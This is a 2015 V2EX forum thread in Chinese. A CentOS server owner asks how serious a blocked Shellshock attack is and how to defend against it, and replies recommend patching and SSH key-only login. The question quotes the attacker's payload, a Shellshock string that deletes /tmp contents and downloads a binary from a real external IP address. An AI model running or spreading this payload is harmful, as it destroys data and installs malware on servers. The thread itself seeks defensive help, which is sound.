安全问题关于破壳攻击的

问题:
服务器被攻击攻击url：
x.x.x,x/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.186.30.161:1003/ok_xiaoma_32_64 -o /tmp/c...

我的是阿里云
centos 6.5
攻击已经被阿里云给拦截了

请问严重吗，我的密码也被暴利破解过，也被阿里云给挡住了。
我该怎么做防护，杜绝这类攻击，谢谢。

krytor

2015-06-23 16:59:15 +08:00

我给阿里云打了个电话，客服说装个杀毒软件，杀一下毒，装个安全狗啥的，好不好啊 -_-

liuyi_beta

2015-06-23 17:16:50 +08:00

话说你的是Linux/Unix 系统啊，客服竟然让你安装杀毒软件。。。及时安装补丁就好了，另外登陆只用证书就好了，关掉密码登陆，将端口改到不常用端口，网站的话可以考虑安装安全狗。

pwinner

2015-06-23 17:25:48 +08:00

杀毒软件。。你在说calm av么233
只用证书登录就安全多啦

virusdefender

2015-06-23 18:55:02 +08:00

这个只是扫描而已如果服务器不存在漏洞可以不用管

phy25

2015-06-23 21:03:33 +08:00

然而你暴露了一个地址 http://222.186.30.161:1003/ 可以拿它来做什么呢 :doge:

krytor

2015-06-23 22:57:09 +08:00

@virusdefender 是给我网站上传可执行文件，这个 http://222.186.30.161:1003/ok_xiaoma_32_64

lk09364

2015-06-23 23:10:06 +08:00

> 我该怎么做防护，杜绝这类攻击，谢谢。
上面提到了——关键字： ssh证书登录

krytor

2015-06-23 23:53:33 +08:00

@lk09364 奥多谢，我见aws都是ssh登陆，我想理解的是上面那个攻击的目的是什么，获取root权限吗

pwinner

2015-06-24 06:50:18 +08:00

@krytor 这不是废话么。。有权限你就是肉鸡了。。。

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

安全问题 关于破壳攻击的